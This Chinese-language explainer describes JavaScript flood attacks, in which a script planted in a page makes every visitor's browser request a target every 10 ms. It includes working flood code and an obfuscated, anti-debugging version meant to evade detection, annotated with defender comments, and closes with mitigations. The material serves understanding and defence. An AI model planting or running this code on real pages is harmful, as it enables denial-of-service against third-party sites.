
回答

什么是 JavaScript 洪水攻击?

JavaScript 洪水攻击就是在网页中加入特殊的 JS 脚本,使访问该网页的每个人的浏览器都高频请求某个目标网站地址;这些访问汇聚起来形成大量请求,即构成了一种 DDoS 攻击,也称为洪水拒绝服务攻击。

JavaScript 洪水攻击示例代码

    <script type="text/javascript">
// Proof-of-concept from the post, kept byte-for-byte; the comments are a defender's
// read of it. Each tick creates an Image whose src points at the hard-coded host, so
// the target receives one GET per tick from every browser that has this page open.
function imgflood(){
// Target host and path are constants in the script; nothing here comes from user input.
var targetip="127.0.0.1";
var url="/index.html";
// Image() is the request carrier: assigning .src is enough to send the GET.
var pic=new Image();
// 0..999 query value, presumably a cache-buster so each request reaches the origin
// rather than being served from the browser cache. Detection hint: many GETs for one
// path whose only variation is `?rand=<n>`, at ~10 ms spacing, from a single client.
var rand=Math.floor(Math.random()*1000);
pic.src="http://"+targetip+url+"?rand="+rand;
}
// setInterval keeps firing for as long as the page stays open.
setInterval(imgflood,10);
</script>


这段代码的含义和攻击原理是:每 10 毫秒,带一个随机参数访问一次 127.0.0.1/index.html。随机参数的作用通常是绕过浏览器缓存,使每次请求都真正到达服务器。

为了防止脚本被识破,此类代码往往还会经过混淆加密;例如用在线 JS 代码混淆工具处理上述 JS 代码后,得到如下结果:

    <script type="text/javascript">
// Obfuscator string table. Every literal the script uses is stored here and fetched
// through _0x2388(index) instead of appearing inline, which is what hides the
// 'http://', '127.0.0.1', '/index.htm' + 'l' and '?rand=' of the plain version from a
// simple grep. The split fragments 'debu' + 'gger' and 'while (tru' + 'e) {}' belong
// to the anti-debugging routine, 'setInterva' + 'l' to the scheduler call.
// On first call the function replaces itself with a closure that returns the array.
function _0x4f31() {
var _0x1a3395 = [
'numAr',
'xukbA',
'ErUrl',
'split',
'mLmVa',
'vKzrU',
'9AZqmOr',
'2430448LxHHeA',
'/index.htm',
'wHSEf',
'WPEzI',
'GVYDW',
'$]*)',
'src',
'xueHl',
'function\x20*',
'5656572wTSYWX',
'call',
'IElAA',
'random',
'1440YsYuBw',
'iJSOp',
'sADzy',
'glLav',
'MiKMb',
'esCIM',
'e)\x20{}',
'hCexA',
'cNjCd',
'apply',
'debu',
'constructo',
'ETTLc',
'IvNAf',
'\x5c+\x5c+\x20*(?:[',
'floor',
'length',
'jkVKG',
'?rand=',
'ofJMY',
'a-zA-Z_$][',
'pRcgv',
'http://',
'4zwWEmL',
'init',
'fjzzz',
'yNrPh',
'stateObjec',
'hRMjD',
'0|3|1|2|4',
'rNmhh',
'yZnBU',
'BvoXB',
'oRaGX',
'chain',
'QCVDc',
'duwGI',
'nction()\x20',
'{}.constru',
'jxktV',
'890675POsWST',
'7214060vCnxtj',
'MUiwd',
'0-9a-zA-Z_',
'1592946XDpvVT',
'\x5c(\x20*\x5c)',
'gger',
'AATxX',
'while\x20(tru',
'3526555YpvATI',
'sLLbz',
'yTYyb',
'counter',
'HfiMG',
'return\x20(fu',
'test',
'setInterva',
'CbVBM',
'input',
'rn\x20this\x22)(',
'127.0.0.1',
'string',
'ctor(\x22retu',
'action',
'NhvZL'
];
// Self-replacement: later calls skip the array literal and return the cached one.
_0x4f31 = function () {
return _0x1a3395;
};
return _0x4f31();
}
// One statement holding two IIFEs.
// (1) Rotates the string table (push(shift())) until a checksum built from
//     parseInt() of selected entries equals the constant passed as the second
//     argument; until then every lookup index would point at the wrong string.
//     An exception inside the checksum also rotates, so the loop cannot be skipped.
// (2) Obtains the global object by compiling
//     "return (function() {}.constructor(\"return this\")( )" with Function(),
//     falling back to window, and registers _0x263771 (the anti-debug routine
//     defined further down) with that global's setInterval ('setInterva' + 'l').
(function (_0x347ffd, _0x4dbd53) {
var _0x4d049e = _0x2388, _0x175c4d = _0x347ffd();
while (!![]) {
try {
var _0x248d2 = parseInt(_0x4d049e(0x15d)) / (-0x643 + -0x1568 + 0x1bac) + parseInt(_0x4d049e(0x135)) / (-0x13f3 * 0x1 + 0x1c82 + -0x1 * 0x88d) * (-parseInt(_0x4d049e(0x127)) / (0x1312 * 0x1 + -0x16d + -0x11a2)) + parseInt(_0x4d049e(0x14c)) / (0x1 * -0x25 + 0x191e * 0x1 + -0x18f5) * (-parseInt(_0x4d049e(0x166)) / (-0x238a * -0x1 + 0x129a + 0x1 * -0x361f)) + -parseInt(_0x4d049e(0x161)) / (0x24b3 + -0x51c + 0x1f91 * -0x1) + parseInt(_0x4d049e(0x15e)) / (0x25dd + 0x1411 + -0x3 * 0x134d) + parseInt(_0x4d049e(0x128)) / (0x3d * -0x10 + 0x2218 * 0x1 + -0x1e40) + -parseInt(_0x4d049e(0x131)) / (0x14df + -0x259e + -0xc * -0x166);
if (_0x248d2 === _0x4dbd53)
break;
else
_0x175c4d['push'](_0x175c4d['shift']());
} catch (_0x11eff8) {
_0x175c4d['push'](_0x175c4d['shift']());
}
}
}(_0x4f31, -0x5155e + 0xcb5 * 0x16d + -0x384cc), (function () {
var _0x30bc99 = _0x2388, _0x4810a5 = {
'numAr': function (_0x56cc0d, _0x421aab) {
return _0x56cc0d(_0x421aab);
},
'GVYDW': function (_0x3c9968, _0x20045a) {
return _0x3c9968 + _0x20045a;
},
'QCVDc': _0x30bc99(0x16b) + _0x30bc99(0x15a),
'cNjCd': _0x30bc99(0x15b) + _0x30bc99(0x173) + _0x30bc99(0x170) + '\x20)',
'IElAA': function (_0x2c77d8) {
return _0x2c77d8();
}
}, _0x379c97;
try {
// Function(source) compiles the "return this" trampoline built from table fragments.
var _0x2f3418 = _0x4810a5[_0x30bc99(0x176)](Function, _0x4810a5[_0x30bc99(0x12c)](_0x4810a5[_0x30bc99(0x12c)](_0x4810a5[_0x30bc99(0x158)], _0x4810a5[_0x30bc99(0x13d)]), ');'));
_0x379c97 = _0x4810a5[_0x30bc99(0x133)](_0x2f3418);
} catch (_0x1601cf) {
// Presumably reached when Function() is unavailable (e.g. blocked by CSP); use window.
_0x379c97 = window;
}
// globalObject.setInterval(_0x263771, <hex arithmetic>): schedules the anti-debug routine.
_0x379c97[_0x30bc99(0x16d) + 'l'](_0x263771, 0x1 * 0x1159 + -0xa * -0xf1 + -0x2f9 * 0x9);
}()));
// Call-once wrapper factory. Only the first wrapper it hands out is live: that
// wrapper invokes the wrapped function a single time (through a table-looked-up
// 'apply'/'call' name) and then drops the reference; every later wrapper, and every
// later call on the live one, is a no-op. Used by the self-defending block below.
var _0xfb1078 = (function () {
var _0x5c0499 = !![];
return function (_0x161020, _0x3243a9) {
var _0x4e506c = _0x5c0499 ? function () {
var _0x4784cb = _0x2388;
if (_0x3243a9) {
var _0x436556 = _0x3243a9[_0x4784cb(0x13e)](_0x161020, arguments);
// Null out after the first invocation so the check cannot be re-run.
return _0x3243a9 = null, _0x436556;
}
} : function () {
};
return _0x5c0499 = ![], _0x4e506c;
};
}());
// Index-to-string resolver used everywhere as _0x2388(0x1xx): subtracts the base
// (the hex arithmetic evaluates to 0x127) and indexes the rotated table from _0x4f31.
// Replaces itself with a leaner closure after the first call; the second parameter
// is unused.
function _0x2388(_0x2034b6, _0x4f31ca) {
var _0x238825 = _0x4f31();
return _0x2388 = function (_0x1a0be4, _0x17e40f) {
_0x1a0be4 = _0x1a0be4 - (-0x3 * -0x725 + -0x988 + -0xac0);
var _0x8cd62e = _0x238825[_0x1a0be4];
return _0x8cd62e;
}, _0x2388(_0x2034b6, _0x4f31ca);
}
// Self-defending block (inferred from the regex fragments 'function *\( *\)' and
// '\+\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)' assembled from the string table). Through the
// call-once helper _0xfb1078 it appears to test the anti-debug routine's own source
// text against those regexes: if the code has been reformatted or beautified the match
// fails and the debugger-trap path is taken instead of a normal call. The presence of
// this pattern is itself a useful detection signal for obfuscated payloads.
(function () {
var _0x511149 = _0x2388, _0xa93be = {
'hRMjD': _0x511149(0x130) + _0x511149(0x162),
'duwGI': _0x511149(0x143) + _0x511149(0x149) + _0x511149(0x160) + _0x511149(0x12d),
'WPEzI': function (_0x32ab7a, _0x2d3e8f) {
return _0x32ab7a(_0x2d3e8f);
},
'yTYyb': _0x511149(0x14d),
'ETTLc': function (_0x1c6a6e, _0x295e1a) {
return _0x1c6a6e + _0x295e1a;
},
'hCexA': _0x511149(0x157),
'ErUrl': _0x511149(0x16f),
'esCIM': function (_0xdd7619, _0x98b923) {
return _0xdd7619(_0x98b923);
},
'AATxX': function (_0x35bc35) {
return _0x35bc35();
},
'rNmhh': function (_0x2b6f43, _0x20fcd1, _0xb5acd) {
return _0x2b6f43(_0x20fcd1, _0xb5acd);
}
};
// Wrap the check so it runs exactly once, bound to `this`.
_0xa93be[_0x511149(0x153)](_0xfb1078, this, function () {
var _0x3f3b06 = _0x511149, _0x7a61dc = new RegExp(_0xa93be[_0x3f3b06(0x151)]), _0x1ec889 = new RegExp(_0xa93be[_0x3f3b06(0x159)], 'i'), _0x41a053 = _0xa93be[_0x3f3b06(0x12b)](_0x263771, _0xa93be[_0x3f3b06(0x168)]);
!_0x7a61dc[_0x3f3b06(0x16c)](_0xa93be[_0x3f3b06(0x141)](_0x41a053, _0xa93be[_0x3f3b06(0x13c)])) || !_0x1ec889[_0x3f3b06(0x16c)](_0xa93be[_0x3f3b06(0x141)](_0x41a053, _0xa93be[_0x3f3b06(0x178)])) ? _0xa93be[_0x3f3b06(0x13a)](_0x41a053, '0') : _0xa93be[_0x3f3b06(0x164)](_0x263771);
})();
}());
// Control-flow-flattened imgflood. The order string '0|3|1|2|4' is split on '|' and
// drives the switch, so the five statements of the plain version still run in their
// original order: target host, path, new Image(), random value (the hex arithmetic
// evaluates to 1000), then src = 'http://' + host + path + '?rand=' + value.
// Behaviour is identical to the plain version above; only the shape differs, which is
// why signature-based detection should key on the resulting requests, not the source.
function imgflood() {
var _0x39b652 = _0x2388, _0xffaee6 = {
'CbVBM': _0x39b652(0x152),
'BvoXB': _0x39b652(0x171),
'IvNAf': function (_0xfba210, _0x287a3b) {
return _0xfba210 * _0x287a3b;
},
'HfiMG': _0x39b652(0x129) + 'l',
'sLLbz': function (_0x42326d, _0x3f6c4c) {
return _0x42326d + _0x3f6c4c;
},
'NhvZL': function (_0x1a8dfe, _0x3f3370) {
return _0x1a8dfe + _0x3f3370;
},
'wHSEf': _0x39b652(0x14b),
'mLmVa': _0x39b652(0x147)
}, _0x59c84e = _0xffaee6[_0x39b652(0x16e)][_0x39b652(0x179)]('|'), _0x96cec4 = 0x1cb8 + -0xc94 + 0x4 * -0x409;
// _0x96cec4 starts at 0 (hex arithmetic); each iteration consumes the next step id.
while (!![]) {
switch (_0x59c84e[_0x96cec4++]) {
case '0':
var _0x4a18ab = _0xffaee6[_0x39b652(0x155)];
continue;
case '1':
var _0x404268 = new Image();
continue;
case '2':
var _0x1b3322 = Math[_0x39b652(0x144)](_0xffaee6[_0x39b652(0x142)](Math[_0x39b652(0x134)](), 0xee5 + -0x116a + 0x66d));
continue;
case '3':
var _0x246979 = _0xffaee6[_0x39b652(0x16a)];
continue;
case '4':
_0x404268[_0x39b652(0x12e)] = _0xffaee6[_0x39b652(0x167)](_0xffaee6[_0x39b652(0x175)](_0xffaee6[_0x39b652(0x167)](_0xffaee6[_0x39b652(0x167)](_0xffaee6[_0x39b652(0x12a)], _0x4a18ab), _0x246979), _0xffaee6[_0x39b652(0x17a)]), _0x1b3322);
continue;
}
// Reached once the order string is exhausted (undefined step id).
break;
}
}
// The hex arithmetic evaluates to 10, i.e. the same 10 ms cadence as the plain version.
setInterval(imgflood, -0x1 * 0xb8d + -0x2f * 0xc7 + 0x3020);
// Anti-debugging routine (scheduled via setInterval in the second IIFE above and also
// invoked by the self-defending block). Nothing in here touches the network; it only
// resists analysis. Inner _0x3df111(n) appears to follow the common obfuscator
// template: a string argument compiles and runs 'while (tru' + 'e) {}' (hangs the
// tab); a numeric argument compiles 'debu' + 'gger' through Function.prototype
// .constructor and recurses with ++n, so an attached devtools session keeps hitting
// breakpoints. The hex constants evaluate to 1, 20 and 0; the try/catch swallows all
// errors. With a truthy argument the inner function is returned instead of run.
function _0x263771(_0x4c0c51) {
var _0x18f3a6 = _0x2388, _0x10e742 = {
'sADzy': function (_0xa68dbc, _0x462975) {
return _0xa68dbc === _0x462975;
},
'jkVKG': _0x18f3a6(0x172),
'jxktV': _0x18f3a6(0x165) + _0x18f3a6(0x13b),
'MUiwd': _0x18f3a6(0x169),
'yZnBU': function (_0xda58d4, _0x3b2dc9) {
return _0xda58d4 !== _0x3b2dc9;
},
'yNrPh': function (_0x4ee3c1, _0x95c840) {
return _0x4ee3c1 + _0x95c840;
},
'pRcgv': function (_0x35efce, _0xc3f9da) {
return _0x35efce / _0xc3f9da;
},
'oRaGX': _0x18f3a6(0x145),
'MiKMb': function (_0x4725b7, _0x573e36) {
return _0x4725b7 === _0x573e36;
},
'fjzzz': function (_0x435f9d, _0x5e3e88) {
return _0x435f9d % _0x5e3e88;
},
'ofJMY': _0x18f3a6(0x13f),
'xukbA': _0x18f3a6(0x163),
'glLav': _0x18f3a6(0x174),
'xueHl': _0x18f3a6(0x150) + 't',
'iJSOp': function (_0x44b6a5, _0x1c3e03) {
return _0x44b6a5(_0x1c3e03);
},
'vKzrU': function (_0xf26cf3, _0x4b359e) {
return _0xf26cf3(_0x4b359e);
}
};
// Recursive trap; the branch is chosen by typeof and by (''+n/n).length / n % 20.
function _0x3df111(_0x54f0ac) {
var _0x17080f = _0x18f3a6;
if (_0x10e742[_0x17080f(0x137)](typeof _0x54f0ac, _0x10e742[_0x17080f(0x146)]))
return function (_0xbf14d9) {
}[_0x17080f(0x140) + 'r'](_0x10e742[_0x17080f(0x15c)])[_0x17080f(0x13e)](_0x10e742[_0x17080f(0x15f)]);
else
_0x10e742[_0x17080f(0x154)](_0x10e742[_0x17080f(0x14f)]('', _0x10e742[_0x17080f(0x14a)](_0x54f0ac, _0x54f0ac))[_0x10e742[_0x17080f(0x156)]], 0x136a + -0x25c8 + 0x125f) || _0x10e742[_0x17080f(0x139)](_0x10e742[_0x17080f(0x14e)](_0x54f0ac, 0xeee + -0x207d + 0xf * 0x12d), 0x1949 + -0x416 * -0x5 + -0x2db7) ? function () {
return !![];
}[_0x17080f(0x140) + 'r'](_0x10e742[_0x17080f(0x14f)](_0x10e742[_0x17080f(0x148)], _0x10e742[_0x17080f(0x177)]))[_0x17080f(0x132)](_0x10e742[_0x17080f(0x138)]) : function () {
return ![];
}[_0x17080f(0x140) + 'r'](_0x10e742[_0x17080f(0x14f)](_0x10e742[_0x17080f(0x148)], _0x10e742[_0x17080f(0x177)]))[_0x17080f(0x13e)](_0x10e742[_0x17080f(0x12f)]);
_0x10e742[_0x17080f(0x136)](_0x3df111, ++_0x54f0ac);
}
try {
if (_0x4c0c51)
return _0x3df111;
else
_0x10e742[_0x18f3a6(0x17b)](_0x3df111, 0x5 * -0x1d1 + 0x26b + 0x6aa);
} catch (_0x4da04e) {
// Errors (including the recursion eventually overflowing) are deliberately swallowed.
}
}
</script>

执行后,可以看到如下结果:


单个访问者即可产生如此多的连接。如果代码被嵌入在某个访问量很大的页面上,想必会产生相当大的威力。

对攻击者而言更"理想"的效果是:访问服务器上与后台有交互、消耗系统 CPU 或磁盘性能的网页,最终使 Web 服务器无法正常处理连接请求。这也是拒绝服务攻击的普遍原理。

那么,对此种可能发生的攻击,该如何防护呢?

对攻击端(即被植入脚本、进而被用来发起请求的网站)而言,要防止自己的页面被植入不法脚本。

对被攻击端而言,也应做好网站安全防护,比如在后台逻辑中对同一访问者的访问频率做限制、为与服务器有交互的页面设计访问验证机制等等。此外,示例脚本产生的请求特征很明显(同一来源每 10 毫秒一次、仅随机 rand 参数不同的图片请求),也可据此在访问日志中识别和拦截。
